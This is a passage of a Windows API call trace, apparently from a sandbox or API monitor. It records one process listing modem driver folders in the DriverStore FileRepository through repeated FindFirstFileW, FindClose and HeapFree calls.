FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl006.inf_amd64_neutral_e5693eb731048022\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48487566, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x668a3322, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x668a3322, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.049] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.049] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.049] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl007.inf_amd64_neutral_935cd017fcb965ee\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x485de1c9, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6693b8a3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6693b8a3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.049] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.049] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.049] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl008.inf_amd64_neutral_d225e15af1a594cd\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x486e8b6b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66987b63, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66987b63, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.050] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.051] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.051] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl009.inf_amd64_neutral_bed6224f27f5c478\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4881966d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x669f9f84, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x669f9f84, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.051] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.051] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.051] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl010.inf_amd64_neutral_46f466c9e68abb4a\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x489702cf, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66a6c3a5, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66a6c3a5, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.052] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.052] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.052] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgsm.inf_amd64_neutral_dd3fbd8c64c7c87d\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b6843c2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x682f86b2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x682f86b2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.052] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.052] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.052] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmhaeu.inf_amd64_neutral_6611a858035bf482\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b71c943, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6831e813, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6831e813, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.053] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.053] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.053] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmhandy.inf_amd64_neutral_386661b46df6da3f\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b7db025, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6836aad3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6836aad3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.053] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.053] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.053] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmhay2.inf_amd64_neutral_ff250f861d941dd8\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b8bf866, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x683b6d94, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x683b6d94, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.054] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.054] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.057] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmhayes.inf_amd64_neutral_507db5d34d7acddc\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b9f0369, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68618398, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68618398, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.057] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.057] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.057] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdminfot.inf_amd64_neutral_fc6bcd80e9e6a3c3\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4bad4baa, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68664659, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68664659, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.058] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.058] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.058] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmiodat.inf_amd64_neutral_839e9ee1a8736613\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4bbdf54c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6889fafd, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6889fafd, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.058] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.058] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.058] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmirmdm.inf_amd64_neutral_fadec14b0a37b637\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39b8ca79, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f6ad510, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f6ad510, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.059] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.059] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.059] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmisdn.inf_amd64_neutral_061c61abd3904560\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4bc9dc2e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x688c5c5d, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x688c5c5d, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.060] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.060] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.060] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmjf56e.inf_amd64_neutral_328dabbf0aeed9bc\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4bd8246f, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68911f1e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68911f1e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.060] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.060] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.060] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmke.inf_amd64_neutral_3e4daa83122b1559\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4be1a9f0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68911f1e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68911f1e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.061] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.061] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.061] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmkortx.inf_amd64_neutral_1975687236603184\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4bed90d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6893807e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6893807e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.061] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.061] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.061] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmlasat.inf_amd64_neutral_bc1469ba40fe2114\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4bf71653, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6898433e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6898433e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.062] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.062] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.062] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmlasno.inf_amd64_neutral_c86d5b5e5fa8b48a\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c055e94, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x689aa49f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x689aa49f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.062] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.062] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.062] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmlucnt.inf_amd64_neutral_642a5ab3f2a1ae20\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c114576, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68be5943, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68be5943, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.063] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.063] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.063] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmc288.inf_amd64_neutral_c4a901dab689ad79\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c1d2c57, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68dfac87, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68dfac87, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.063] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.063] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.063] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmcd.inf_amd64_neutral_49212f5920298e45\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c291338, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68e20de7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68e20de7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.066] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.066] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.066] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmcom.inf_amd64_neutral_716a306ec3899e04\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c34fa1a, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68e20de7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68e20de7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.066] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.066] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.066] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmct.inf_amd64_neutral_15bb3ed734fbbeb3\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c43425c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68e6d0a7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68e6d0a7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.067] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.067] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.067] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmega.inf_amd64_neutral_f9c441ed24f00358\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c4f293d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68e93208, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68e93208, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.068] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.068] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.068] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmetri.inf_amd64_neutral_f89b8a357327f615\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c5d717f, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68eb9368, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68eb9368, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.068] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.068] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.068] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmhrtz.inf_amd64_neutral_10affee00545fb45\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c6e1b20, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68f2b789, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68f2b789, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.069] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.069] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.069] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmhzel.inf_amd64_neutral_1292ec506cfc26db\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c85e8e3, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68f9dbaa, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68f9dbaa, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.069] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.069] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.069] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmminij.inf_amd64_neutral_7c300346e830b2dc\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c969285, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6903612b, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6903612b, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.070] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.070] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.070] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmod.inf_amd64_neutral_5766736c47b90fff\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ca01806, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x690823eb, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x690823eb, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.070] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.070] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.070] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmot64.inf_amd64_neutral_1abbad2f29c8fa08\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x507bf318, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6c1285e5, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6c1285e5, 